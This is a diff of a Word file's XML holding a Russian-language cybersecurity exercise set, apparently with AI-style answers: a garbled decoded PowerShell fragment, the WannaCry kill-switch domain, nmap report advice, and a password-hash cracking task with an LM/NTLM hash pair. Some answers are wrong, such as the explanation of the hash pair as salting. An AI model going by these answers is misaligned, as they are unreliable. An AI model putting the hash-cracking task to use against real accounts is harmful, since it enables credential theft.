     <w:p>
@@ -6120,6 +5398,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6138,163 +5421,77 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:t>print(decoded_string)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Вот раскодированное содержимое:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>decoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>stylus</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>decoded_bytes.decode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>('utf-8', errors='ignore')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
+        <w:t>JgBhgcp.com 65001&gt; $null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:tab/>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>print</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>decoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Вот раскодированное содержимое:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>stylus</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>JgBhgcp.com 65001&gt; $null</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exec_wraper_st</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = $input -Out-String</w:t>
+        <w:t xml:space="preserve">    $exec_wraper_st = $input -Out-String</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6312,95 +5509,15 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">     $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>splitt_part</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exec_wraper_st.Spliti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exex_wraper_st.Length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -eq $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exex_wraper_st.Length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -eq 2) { throw "invalid payload" }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Похоже, это фрагмент скрипта </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
+        <w:t xml:space="preserve">     $splitt_part = $exec_wraper_st.Spliti($exex_wraper_st.Length -eq $exex_wraper_st.Length -eq 2) { throw "invalid payload" }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Похоже, это фрагмент скрипта PowerShell. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6476,15 +5593,7 @@
         <w:t>Вредоносное ПО</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Некоторые вирусы или вредоносные программы могут </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>masquerade</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
+        <w:t>: Некоторые вирусы или вредоносные программы могут masquerade (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6573,23 +5682,7 @@
         <w:t>Проверка целостности системы</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Запустите команду </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sfc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>scannow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> в командной строке для проверки и восстановления системных файлов.</w:t>
+        <w:t>: Запустите команду sfc /scannow в командной строке для проверки и восстановления системных файлов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6629,6 +5722,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Вы установили приложение на свой ПК, и оно не может подключиться к Интернету. Предупреждений от антивируса нет, и вы можете просматривать Интернет. Какова наиболее вероятная причина проблемы?</w:t>
       </w:r>
     </w:p>
@@ -6650,7 +5744,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -6781,39 +5874,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kryptos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
+        <w:t>URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит Kryptos Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя WannaCry. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель WannaCry пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6829,31 +5898,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
+        <w:t>Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя WannaCry. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя WannaCry и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6881,59 +5934,35 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Отчет о сканировании </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Основные аспекты отчета </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования nmap?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Отчет о сканировании Nmap предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Основные аспекты отчета Nmap</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6958,6 +5987,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">        Порты могут находиться в трех состояниях: открыты, фильтруемы и закрыты. Открытые порты указывают на доступные службы, которые могут быть уязвимыми для атак. Фильтруемые порты могут быть защищены брандмауэром, что затрудняет определение их состояния</w:t>
       </w:r>
     </w:p>
@@ -7011,16 +6041,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
+        <w:t xml:space="preserve">        Nmap поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7044,55 +6065,15 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">    Дополнительные скрипты </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> также позволяет использовать NSE (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Scripting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
+        <w:t xml:space="preserve">    Дополнительные скрипты Nmap:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        Nmap также позволяет использовать NSE (Nmap Scripting Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7142,15 +6123,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Таким образом, анализируя отчет </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
+        <w:t>Таким образом, анализируя отчет Nmap, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7167,13 +6140,8 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Восстановите пароль из </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>хеша</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Восстановите пароль из хеша</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7207,31 +6175,23 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>aad3b435b51404eeaad3b435b51404ee:bebaecb23aa18f5375628541ff3fb3b8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Это указывает на использование NTLM (первый </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>хеш</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) и вероятно, что второй </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>хеш</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> является результатом применения к паролю какой-то соли или дополнительной обработки.</w:t>
+        <w:t>aad3b435b51404eeaad3b435b51404ee</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>bebaecb23aa18f5375628541ff3fb3b8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Это указывает на использование NTLM (первый хеш) и вероятно, что второй хеш является результатом применения к паролю какой-то соли или дополнительной обработки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7284,11 +6244,19 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
+        <w:tab/>
+        <w:t>Hashcat</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">сообщает, что пустой пароль </w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -7301,7 +6269,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="02E24767"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -9932,7 +8900,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
